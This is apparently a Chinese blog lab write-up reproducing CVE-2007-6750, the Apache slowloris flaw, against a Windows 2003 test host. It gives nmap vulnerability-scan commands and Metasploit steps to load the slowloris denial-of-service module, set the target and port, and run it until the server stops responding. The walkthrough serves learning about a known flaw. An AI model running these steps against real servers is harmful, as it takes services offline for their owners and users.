一.介绍及准备
1.本文介绍CVE-2007-6750复现。
2.准备:kali系统、win2003 Enterprise
二.CVE-2007-6750复现
1.漏洞产生原因:
Apache HTTP服务器1.x和2.x允许远程攻击者通过部分HTTP请求导致拒绝服务(守护进程中断),这与2.2.15之前版本中缺少mod_ReqTimeout模块有关。
2.怀着对学习的热爱,打开kali终端对win2003进行:nmap IP --script=auth,vuln;然后吧,来啦个CVE-2007-6750:
3.:接着来看看有啥可以玩的nmap -sV ip ,发现该端口开放
4.下一步就是直接启动msf,终端输入:msfconsole
5.然后搜一下有啥可以用的模块:search slowloris;有一个,然后吧,use一下:use auxiliary/dos/http/slowloris
6.show options,看看要设置什么,发现没有rhost,端口不对,改一下吧:Set rhost IP、set rport 8082
7.设置完成输入run或者exploit看看效果吧
发现怎么等都打不开对不?那么恭喜你复现成功。
网友评论